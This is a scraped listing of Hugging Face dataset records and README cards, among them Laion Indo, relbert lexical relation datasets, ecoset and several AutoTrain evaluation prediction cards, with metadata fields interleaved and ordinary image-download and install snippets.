Laion Indo is a Translated subset laion 400m dataset with 70 million image-text pairs specifically meant to be used for visionand-language Indonesia pre-training. The Dataset translated using custom marian model ### Dataset Preprocessing This dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code: ```python from concurrent.futures import ThreadPoolExecutor from functools import partial import io import urllib import PIL.Image from datasets import load_dataset from datasets.utils.file_utils import get_datasets_user_agent USER_AGENT = get_datasets_user_agent() def fetch_single_image(image_url, timeout=None, retries=0): for _ in range(retries + 1): try: request = urllib.request.Request( image_url, data=None, headers={"user-agent": USER_AGENT}, ) with urllib.request.urlopen(request, timeout=timeout) as req: image = PIL.Image.open(io.BytesIO(req.read())) break except Exception: image = None return image def fetch_images(batch, num_threads, timeout=None, retries=0): fetch_single_image_with_args = partial(fetch_single_image, timeout=timeout, retries=retries) with ThreadPoolExecutor(max_workers=num_threads) as executor: batch["image"] = list(executor.map(fetch_single_image_with_args, batch["image_url"])) return batch num_threads = 20 dset = load_dataset("munggok/Laion_Indo") dset = dset.map(fetch_images, batched=True, batch_size=100, fn_kwargs={"num_threads": num_threads}) ``` ### Supported Tasks and Leaderboards - `image-captioning`: This dataset can be used to train model for the Image Captioning task. ### Languages All captions Translated in Indonesia. ## Dataset Structure ### Data Instances Each instance represents a single image with a caption: ``` { 'image_url': 'image_url', 'caption': 'text here', 'meta' : 'metadata from orginal laion' } ``` ### Data Fields - `image_url`: Static URL for downloading the image associated with the post. - `caption`: Textual description of the image. - `meta` : Containing meta data from laion original dataset (Width,Height,NSFW,Similarity) ### Data Splits There is only training data, with a total of 70662144 rows ## Dataset Creation ### Curation Rationale ### Source Data #### Initial Data Collection and Normalization From the paper: LAION-400M: Open Dataset of CLIP-Filtered 400 Million Image-Text Pairs](https://arxiv.org/abs/2111.02114) #### Who are the source language producers? Not specified. ### Annotations #### Annotation process Annotations are extracted jointly with the images using the automatic pipeline. #### Who are the annotators? Not specified. ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators Soravit Changpinyo, Piyush Sharma, Nan Ding and Radu Soricut. ### Licensing Information CC BY-NC-SA 4.0 ### Citation Information ```bibtex @article{DBLP:journals/corr/abs-2111-02114, author = {Christoph Schuhmann and Richard Vencu and Romain Beaumont and Robert Kaczmarczyk and Clayton Mullis and Aarush Katta and Theo Coombes and Jenia Jitsev and Aran Komatsuzaki}, title = {{LAION-400M:} Open Dataset of CLIP-Filtered 400 Million Image-Text Pairs}, journal = {CoRR}, volume = {abs/2111.02114}, year = {2021}, url = {https://arxiv.org/abs/2111.02114}, eprinttype = {arXiv}, eprint = {2111.02114}, timestamp = {Fri, 05 Nov 2021 15:25:54 +0100}, biburl = {https://dblp.org/rec/journals/corr/abs-2111-02114.bib}, bibsource = {dblp computer science bibliography, https://dblp.org} } ```
adamnik
null
null
null
false
6
false
adamnik/event_detection_dataset
2022-07-20T19:18:18.000Z
null
false
02af6989833382fc594889cc1294954c46a74fe3
[]
[ "license:mit" ]
https://huggingface.co/datasets/adamnik/event_detection_dataset/resolve/main/README.md
--- license: mit ---
fafaf
null
null
null
false
2
false
fafaf/IngrifoDataKerrigan
2022-07-20T20:13:48.000Z
null
false
24061b8d3cc323a202b3551cc5dc17b91d80fa6f
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/fafaf/IngrifoDataKerrigan/resolve/main/README.md
--- license: afl-3.0 ---
relbert
null
@inproceedings{wang-etal-2019-spherere, title = "{S}phere{RE}: Distinguishing Lexical Relations with Hyperspherical Relation Embeddings", author = "Wang, Chengyu and He, Xiaofeng and Zhou, Aoying", booktitle = "Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics", month = jul, year = "2019", address = "Florence, Italy", publisher = "Association for Computational Linguistics", url = "https://aclanthology.org/P19-1169", doi = "10.18653/v1/P19-1169", pages = "1727--1737", abstract = "Lexical relations describe how meanings of terms relate to each other. Typical examples include hypernymy, synonymy, meronymy, etc. Automatic distinction of lexical relations is vital for NLP applications, and also challenging due to the lack of contextual signals to discriminate between such relations. In this work, we present a neural representation learning model to distinguish lexical relations among term pairs based on Hyperspherical Relation Embeddings (SphereRE). Rather than learning embeddings for individual terms, the model learns representations of relation triples by mapping them to the hyperspherical embedding space, where relation triples of different lexical relations are well separated. Experiments over several benchmarks confirm SphereRE outperforms state-of-the-arts.", }
[Lexical Relation Classification](https://aclanthology.org/P19-1169/)
false
2,253
false
relbert/lexical_relation_classification
2022-07-20T23:24:17.000Z
null
false
9862d1e870fe6dba4922d3d326c9c8b90a2ecad5
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:n<1K" ]
https://huggingface.co/datasets/relbert/lexical_relation_classification/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - n<1K pretty_name: Lexical Relation Classification --- # Dataset Card for "relbert/lexical_relation_classification" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://aclanthology.org/P19-1169/](https://aclanthology.org/P19-1169/) - **Dataset:** Lexical Relation Classification ### Dataset Summary Five different datasets (`BLESS`, `CogALexV`, `EVALution`, `K&H+N`, `ROOT09`) for lexical relation classification used in [SphereRE](https://www.aclweb.org/anthology/P19-1169/). ### Dataset Summary This dataset contains 5 different word analogy questions used in [Analogy Language Model](https://aclanthology.org/2021.acl-long.280/). | name | train | validation | test | |---------------|------:|-------:|-----:| | `BLESS` | 18582 | 1327 | 6637 | | `CogALexV` | 3054 | - | 4260 | | `EVALution` | 5160 | 372 | 1846 | | `K&H+N` | 40256 | 2876 | 14377 | | `ROOT09` | 8933 | 638 | 3191 | ## Dataset Structure ### Data Instances An example looks as follows. ``` {"head": "turtle", "tail": "live", "relation": "event"} ``` The `stem` and `tail` are the word pair and `relation` is the corresponding relation label. ### Citation Information ``` @inproceedings{wang-etal-2019-spherere, title = "{S}phere{RE}: Distinguishing Lexical Relations with Hyperspherical Relation Embeddings", author = "Wang, Chengyu and He, Xiaofeng and Zhou, Aoying", booktitle = "Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics", month = jul, year = "2019", address = "Florence, Italy", publisher = "Association for Computational Linguistics", url = "https://aclanthology.org/P19-1169", doi = "10.18653/v1/P19-1169", pages = "1727--1737", abstract = "Lexical relations describe how meanings of terms relate to each other. Typical examples include hypernymy, synonymy, meronymy, etc. Automatic distinction of lexical relations is vital for NLP applications, and also challenging due to the lack of contextual signals to discriminate between such relations. In this work, we present a neural representation learning model to distinguish lexical relations among term pairs based on Hyperspherical Relation Embeddings (SphereRE). Rather than learning embeddings for individual terms, the model learns representations of relation triples by mapping them to the hyperspherical embedding space, where relation triples of different lexical relations are well separated. Experiments over several benchmarks confirm SphereRE outperforms state-of-the-arts.", } ``` ### LICENSE The LICENSE of all the resources are under [CC-BY-NC-4.0](./LICENSE). Thus, they are freely available for academic purpose or individual research, but restricted for commercial use.
relbert
null
@article{turney2008latent, title={The latent relation mapping engine: Algorithm and experiments}, author={Turney, Peter D}, journal={Journal of Artificial Intelligence Research}, volume={33}, pages={615--655}, year={2008} }
[Relation Mapping](https://www.jair.org/index.php/jair/article/view/10583)
false
498
false
relbert/relation_mapping
2022-08-11T10:51:58.000Z
null
false
517e8e60404a2e2961bf28e0fd3631cd8424e81d
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:1<n<1K" ]
https://huggingface.co/datasets/relbert/relation_mapping/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - 1<n<1K pretty_name: Relation Mapping --- # Dataset Card for "relbert/relation_mapping" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://www.jair.org/index.php/jair/article/view/10583](https://www.jair.org/index.php/jair/article/view/10583) - **Dataset:** Relation Mapping ### Dataset Summary Relation Mapping is a task to choose optimal combination of word pairs (see more detail in the [paper](https://www.jair.org/index.php/jair/article/view/10583)). Relation mapping `M` is the set of bijective map in between two sets of terms (`A` and `B`): ``` [set `A`]: ("solar system", "sun", "planet", "mass", "attracts", "revolves", "gravity") [set `B`]: ("atom", "nucleus", "electron", "charge", "attracts", "revolves", "electromagnetism") [Relation Mapping `M`] * "solar system" -> "atom" * "sun" -> "nucleus" * "planet" -> "electron" * "mass" -> "charge" * "attracts" -> "attracts" * "revolves" -> "revolves" * "gravity" -> "electromagnetism" ``` ***[Relation Mapping Problem](https://www.jair.org/index.php/jair/article/view/10583)*** is the task to identify the mapping `M` given the sets of terms `A` and `B`. ## Dataset Structure ### Data Instances An example looks as follows. ``` { "id": "m10", "reference": ["seeing", "understanding"], "source": ["seeing", "light", "illuminating", "darkness", "view", "hidden"], "target": ["understanding", "knowledge", "explaining", "confusion", "interpretation", "secret"], "agreement": [68.2, 77.3, 86.4, 86.4, 68.2, 86.4], "pos": ["vbg", "nn", "vbg", "nn", "nn", "jj"], "target_random": ["knowledge", "interpretation", "explaining", "confusion", "understanding", "secret"] } ``` - `source`: A list of terms, which is the source of the relation mapping from. - `target_random`: A list of terms, where we want to find a mapping from `source` to. - `target`: A correctly ordered `target_random` that aligns with the `source`. Given `source` and `target_random`, the task is to predict the correct order of `target_random` so that it matches `target`. In average 7 terms are in the set, so the total number of possible order is 5040. ### Data Splits | name |test| |---------|----:| |relation_mapping| 20 | ### Citation Information ``` @article{turney2008latent, title={The latent relation mapping engine: Algorithm and experiments}, author={Turney, Peter D}, journal={Journal of Artificial Intelligence Research}, volume={33}, pages={615--655}, year={2008} } ```
conceptofmind
null
null
null
false
1
false
conceptofmind/test
2022-07-21T02:23:45.000Z
null
false
272eb4dff01e254d0a962aee8dfbd729710574d8
[]
[]
https://huggingface.co/datasets/conceptofmind/test/resolve/main/README.md
test
richartruddie
null
null
null
false
1
false
richartruddie/richartruddie
2022-07-21T05:42:42.000Z
null
false
06cdd71aa5f3779efac159b56d9be175b6719a52
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/richartruddie/richartruddie/resolve/main/README.md
--- license: apache-2.0 ---
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-xsum-8bc70ef8-11355511
2022-07-22T06:44:01.000Z
null
false
10c6f27014e29ecee20aaa336dc25412c0fedf81
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:xsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-xsum-8bc70ef8-11355511/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - xsum eval_info: task: summarization model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 metrics: [] dataset_name: xsum dataset_config: default dataset_split: test col_mapping: text: document target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 * Dataset: xsum * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model.
kietzmannlab
null
@article{mehrer2021ecologically, title={An ecologically motivated image dataset for deep learning yields better models of human vision}, author={Mehrer, Johannes and Spoerer, Courtney J and Jones, Emer C and Kriegeskorte, Nikolaus and Kietzmann, Tim C}, journal={Proceedings of the National Academy of Sciences}, volume={118}, number={8}, year={2021}, publisher={National Acad Sciences} }
Tired of all the dogs in ImageNet (ILSVRC)? Then ecoset is here for you. 1.5m images from 565 basic level categories, chosen to be both (i) frequent in linguistic usage, and (ii) rated by human observers as concrete (e.g. ‘table’ is concrete, ‘romance’ is not). Here we collect resources associated with ecoset. This includes the dataset, trained deep neural network models, code to interact with them, and published papers using it.
false
5
false
kietzmannlab/ecoset
2022-10-21T15:11:44.000Z
ecoset
false
8ef1b28a538b6c259b5e1ad6098b03a8c6f09336
[]
[ "license:cc", "source_datasets:original", "task_categories:image-classification", "task_ids:multi-class-classification", "task_ids:multi-class-image-classification", "tags:other-image-classification", "tags:image-classification" ]
https://huggingface.co/datasets/kietzmannlab/ecoset/resolve/main/README.md
--- license: cc source_datasets: - original task_categories: - image-classification task_ids: - multi-class-classification - multi-class-image-classification paperswithcode_id: ecoset pretty_name: Ecoset tags: - other-image-classification - image-classification --- ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Installation](#installation) - [Install requirements](#install-requirements) - [Download settings](#download-settings) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Homepage:** [https://www.kietzmannlab.org/ecoset](https://www.kietzmannlab.org/ecoset/) - **Repository:** [https://codeocean.com/capsule/9570390/tree/v1](https://codeocean.com/capsule/9570390/tree/v1) - **Paper:** [https://www.pnas.org/doi/full/10.1073/pnas.2011417118](https://doi.org/10.1073/pnas.2011417118) - **Point of Contact:** [tim.kietzmann@uni-osnabrueck.de](tim.kietzmann@uni-osnabrueck.de) ### Dataset Summary Tired of all the dogs in ImageNet (ILSVRC)? Then ecoset is here for you. 1.5m images from 565 basic level categories, chosen to be both (i) frequent in linguistic usage, and (ii) rated by human observers as concrete (e.g. ‘table’ is concrete, ‘romance’ is not). Ecoset is a typical image recognition dataset, combining images of objects with appropriate labels (one label per image). Importantly, ecoset is intended to provide higher ecological validity than its counterparts, with a mislabelling error rate < 5% and filtered for NSFW content. For more information on the dataset, consider reading the [original publication](https://doi.org/10.1073/pnas.2011417118). Ecoset consists of a train, test, and validation subset which all are openly available to the user. ### Supported Tasks and Leaderboards Ecoset is a large multi-class single-label object recognition image dataset (similar to ImageNet). ## Installation ### Install Requirements In order to work with ecoset, please make sure to install the s3 compatible version of huggingface datasets, which should include the `s3fs`, `botocore` and `boto3` modules: ```bash pip install datasets[s3] ``` If you want to work with the dataset in `Huggingface.datasets`, you might also want to make sure to install PIL (`pip install Pillow`) in order to work with image input. However, downloading the dataset will work despite not having installed PIL. ### Download Settings Please set `ignore_verifications=True`. when downloading this dataset, else the download will result in an error: ```python from datasets import load_dataset dataset = load_dataset("kietzmannlab/ecoset", ignore_verifications=True) ``` | NOTE: If you get errors like: `FileNotFoundError: [Errno 2] No such file or directory:'<DATASET_PATH>'` this is likely due do having previously downloaded the dataset and then cancelling the download. If this is the case for you, you can fix this error by manually removing the dataset path and reinstalling the dataset. | | --- | ## Dataset Structure We show detailed information for all the configurations of the dataset. Currently, there is only one setting (`Full`) available, containing all data. ### Data Instances #### Full - **Size of downloaded dataset files:** 155 GB - **Total amount of disk used:** 311 GB ## Dataset Creation A total of 565 categories were selected based on the following: 1) their word frequency in American television and film subtitles (SUBTLEX_US), 2) the perceived concreteness by human observers, and 3) the availability of a minimum of 700 images. Images were sourced via the overall ImageNet database (the same resource used for ILSVRC 2012) or obtained under CC BY-NC-SA 2.0 license from Bing image search and Flickr. Thorough data cleaning procedures were put in place to remove duplicates and to assure an expected misclassification rate per category of <4%. ### Curation Rationale More information on the curation of the dataset can be found in the [original publication](https://doi.org/10.1073/pnas.2011417118). ### Source Data The source data is available under: [https://codeocean.com/capsule/9570390/tree/v1](https://codeocean.com/capsule/9570390/tree/v1) ### Annotations Each ecoset image folder is annotated with class labels according to the main object depicted in a class of images. No further annotations are added to the dataset. ### Personal and Sensitive Information The dataset was tested to exclude sensitive images using Yahoo's Open NSFW detection model, removing all image with an NSFW score above 0.8. For this dataset, only images with secured license information was used, which should prevent the inclusion of images without consent of the image's authors and subjects. Despite these measures, it is possible that the images in the dataset contain personal and sensitive information. ## Considerations for Using the Data ### Social Impact of Dataset Large-scale image-label datasets such as ImageNet are the backbone of modern Computer Vision. However, such large datasets often suffer from problems like mislabeling, category biases, misrepresentations, and unsafe content. Ecoset was created with the aim to reduce these biases and consequently improve the social impact of Computer Vision techniques trained on the dataset. More information on the social impact of the dataset can be found in the [original publication](https://doi.org/10.1073/pnas.2011417118). ### Discussion of Biases Despite best efforts to provide an ecologically valid and overall less biased dataset, ecoset is still likely to contain biased data. The category selection of ecoset was based on human concreteness ratings and word frequencies in a corpus consisting of American television and film subtitles. This undoubtedly biases the category selection toward Western cultures. Image inclusion was based on the availability via Bing/Flickr search results as well as the existence of relevant ImageNet categories. Images depicting people, specifically the categories “man,” “woman,” and “child,” were not sampled according to census distributions (age, ethnicity, gender, etc.). ### Other Known Limitations In addition to points mentioned in [Discussion of Biases](#discussion-of-biases), ecoset image and category distributions do not reflect the naturalistic, egocentric visual input typically encountered in the everyday life of infant and adults. ## Additional Information ### Dataset Curators The corpus was put together by Johannes Mehrer, Courtney J. Spoerer, Emer C. Jones, Nikolaus Kriegeskorte, and Tim C. Kietzmann. ### Licensing Information Ecoset is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 2.0 license (cc-by-nc-sa-2.0). ### Citation Information ``` @article{mehrer2021ecologically, title={An ecologically motivated image dataset for deep learning yields better models of human vision}, author={Mehrer, Johannes and Spoerer, Courtney J and Jones, Emer C and Kriegeskorte, Nikolaus and Kietzmann, Tim C}, journal={Proceedings of the National Academy of Sciences}, volume={118}, number={8}, pages={e2011417118}, year={2021}, publisher={National Acad Sciences} } ``` ### Contributions The ecoset dataloader and dataset card was created by [@DiGyt](https://github.com/DiGyt) on behalf of [@kietzmannlab](https://huggingface.co/kietzmannlab). For questions and suggestions feel free to reach out.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395515
2022-07-21T09:57:46.000Z
null
false
9d7c3583cb446ef2e26c6fca24324e7dd295e238
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cestwc/cnn_dailymail-test50" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395515/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cestwc/cnn_dailymail-test50 eval_info: task: summarization model: facebook/bart-large-cnn metrics: [] dataset_name: cestwc/cnn_dailymail-test50 dataset_config: cestwc--cnn_dailymail-test50 dataset_split: test col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: facebook/bart-large-cnn * Dataset: cestwc/cnn_dailymail-test50 * Config: cestwc--cnn_dailymail-test50 * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Buckeyes2019](https://huggingface.co/Buckeyes2019) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395514
2022-07-21T09:58:16.000Z
null
false
035943f67ab75602dc39ab84e279f27f10e80e1e
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cestwc/cnn_dailymail-test50" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395514/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cestwc/cnn_dailymail-test50 eval_info: task: summarization model: google/pegasus-cnn_dailymail metrics: [] dataset_name: cestwc/cnn_dailymail-test50 dataset_config: cestwc--cnn_dailymail-test50 dataset_split: test col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: google/pegasus-cnn_dailymail * Dataset: cestwc/cnn_dailymail-test50 * Config: cestwc--cnn_dailymail-test50 * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Buckeyes2019](https://huggingface.co/Buckeyes2019) for evaluating this model.
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-banking77-10fe815c-11415521
2022-07-21T12:41:56.000Z
null
false
0f685a035621e4a9c17aa71437e1d6325144d5d4
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:banking77" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-banking77-10fe815c-11415521/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - banking77 eval_info: task: multi_class_classification model: nickprock/distilbert-base-uncased-banking77-classification metrics: [] dataset_name: banking77 dataset_config: default dataset_split: test col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: nickprock/distilbert-base-uncased-banking77-classification * Dataset: banking77 * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-banking77-34727576-11425522
2022-07-21T12:41:53.000Z
null
false
e83125a08d57be6c9e0aa40ad7f06ecb1d77adc5
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:banking77" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-banking77-34727576-11425522/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - banking77 eval_info: task: multi_class_classification model: nickprock/distilbert-base-uncased-banking77-classification metrics: [] dataset_name: banking77 dataset_config: default dataset_split: test col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: nickprock/distilbert-base-uncased-banking77-classification * Dataset: banking77 * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-banking77-9cb960fa-11435523
2022-07-21T12:41:59.000Z
null
false
1f3971387a63eab5ed76d795c501249904f2161b
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:banking77" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-banking77-9cb960fa-11435523/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - banking77 eval_info: task: multi_class_classification model: nickprock/distilbert-base-uncased-banking77-classification metrics: [] dataset_name: banking77 dataset_config: default dataset_split: test col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: nickprock/distilbert-base-uncased-banking77-classification * Dataset: banking77 * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cnn_dailymail-82ea4996-11445524
2022-07-22T14:59:19.000Z
null
false
2ba19f47e9b5a645c1c2e9232c8abd69f91ec8df
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cnn_dailymail" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cnn_dailymail-82ea4996-11445524/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cnn_dailymail eval_info: task: summarization model: facebook/bart-large-cnn metrics: [] dataset_name: cnn_dailymail dataset_config: 3.0.0 dataset_split: train col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: facebook/bart-large-cnn * Dataset: cnn_dailymail * Config: 3.0.0 * Split: train To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@jmsteen](https://huggingface.co/jmsteen) for evaluating this model.
munggok
null
null
null
false
1
false
munggok/pmd_indonesia
2022-07-21T16:37:36.000Z
null
false
85a3e098ce748e1590a85b370b61a62e898d0bf5
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/munggok/pmd_indonesia/resolve/main/README.md
--- license: cc-by-4.0 ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-976d13e6-0b05-475e-9b4e-e8fbc174cfae-346
2022-07-21T15:37:45.000Z
null
false
f39a0f32e1e09f34099c4b0ed22b35935e537cbc
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-976d13e6-0b05-475e-9b4e-e8fbc174cfae-346/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-d3ec9b9a-b64a-40a0-baff-3af478f604df-367
2022-07-21T15:50:03.000Z
null
false
e66c0d2ce2bde245f0a64d8eea309b2f27e26c80
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-d3ec9b9a-b64a-40a0-baff-3af478f604df-367/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-f2158b57-4f5f-457d-9656-edbe0fb0d311-398
2022-07-21T16:01:11.000Z
null
false
0a02e8200fb7a51296112bade2ab912df6f09361
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-f2158b57-4f5f-457d-9656-edbe0fb0d311-398/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-e81e3618-f3e1-472b-97e0-2794cda0adb2-409
2022-07-21T16:09:50.000Z
null
false
127f37dff7cde0aad160e7e0343214ae6114046e
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-e81e3618-f3e1-472b-97e0-2794cda0adb2-409/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-df92c53c-2bfd-442d-8572-7541578e7feb-4110
2022-07-21T16:23:07.000Z
null
false
